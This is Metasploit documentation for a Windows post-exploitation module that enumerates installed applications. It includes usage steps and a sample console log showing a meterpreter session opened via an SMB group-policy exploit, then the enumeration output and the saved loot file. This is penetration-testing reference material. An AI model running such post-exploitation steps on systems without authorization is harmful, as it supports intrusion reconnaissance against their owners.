43 lines
1.1 KiB
Markdown
43 lines
1.1 KiB
Markdown
## Vulnerable Application
|
|
|
|
This module will enumerate all installed applications on a Windows system.
|
|
|
|
## Verification Steps
|
|
1. Start msfconsole
|
|
2. Get meterpreter session
|
|
3. Do: ```use post/windows/gather/enum_applications```
|
|
4. Do: ```set SESSION <session id>```
|
|
5. Do: ```run```
|
|
|
|
## Options
|
|
|
|
**SESSION**
|
|
|
|
The session to run this module on.
|
|
|
|
## Scenarios
|
|
|
|
### Windows 7 (6.1 Build 7601, Service Pack 1).
|
|
|
|
```
|
|
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-10 14:18:44 -0700
|
|
|
|
msf exploit(windows/smb/group_policy_startup) > use post/windows/gather/enum_applications
|
|
msf post(windows/gather/enum_applications) > set SESSION 1
|
|
SESSION => 1
|
|
msf post(windows/gather/enum_applications) > run
|
|
|
|
[*] Enumerating applications installed on PC
|
|
|
|
Installed Applications
|
|
======================
|
|
|
|
Name Version
|
|
---- -------
|
|
PuTTY release 0.73 0.73.0.0
|
|
|
|
|
|
[+] Results stored in: /root/.msf4/loot/20191211092812_default_192.168.1.4_host.application_951840.txt
|
|
[*] Post module execution completed
|
|
```
|